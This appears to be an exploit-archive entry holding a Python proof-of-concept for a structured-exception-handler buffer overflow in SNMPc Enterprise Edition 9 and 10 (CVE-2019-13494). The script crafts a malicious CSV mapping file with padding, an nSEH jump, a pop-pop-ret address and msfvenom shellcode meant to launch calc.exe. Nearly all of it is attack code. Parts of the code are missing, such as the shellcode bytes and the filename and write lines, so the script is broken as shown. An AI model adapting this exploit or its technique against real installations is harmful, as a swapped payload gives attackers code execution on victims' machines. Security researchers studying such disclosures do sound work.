SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow

Related Vulnerabilities: CVE-2019-13494  
Publish Date: 11 Jul 2019
Author: mark
# -*- coding: utf-8 -*-

# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #   
# Date: 11 July 2019                                                 #
# Exploit Author: @xerubus |                            #
# Vendor Homepage:                       #
# Software Linke:         #
# Version: Enterprise Editioin 9 & 10                                #
# Tested on:  Windows 7                                              # 
# CVE-ID: CVE-2019-13494                                             #
# Full write-up:                    #
import sys, os  

        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= SNMPc_Mapping_BOF by @xerubus =-    
|   D _]/\ \  -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)

junk = "A" * 2064    
nseh = "\xeb\x07\x90\x90"      # short jmp to 0018f58d  \xeb\x07\x90\x90
seh = "\x05\x3c\x0e\x10"       # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll)

# Pre-padding of mapping file.  Note mandatory trailing character return.
pre_padding = ( 
"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
"\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\",\"000=Unknown\",\"\",\"auto.ico\",\"\",\"2\",\"Square\",\"(NULL)\",\"(0,0)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"\",\"30\",\"2\",\"2\",\"\",\"0\",\"0\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n"

# Post-padding of mapping file.  Note mandatory trailing character return.
post_padding = ( 
"\",\"Device\",\"\",\"\",\"\",\"3\",\"000=Unknown\",\"000=Unknown\",\"auto.ico\",\"\",\"2\",\"Square\",\"Root Subnet(2)\",\"(-16,-64)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"\",\"30\",\"2\",\"2\",\"\",\"0\",\"=\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n")

# msfvenom —platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c
shellcode = (

print "[+] Building payload.."
payload = "\x90" * 10 + shellcode
print "[+] Creating buffer.."
buffer = pre_padding + junk + nseh + seh + payload + "\x90" * 10 + post_padding
print "[+] Writing evil mapping file.."
textfile = open(filename , 'w')
print "[+] Done.  Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n"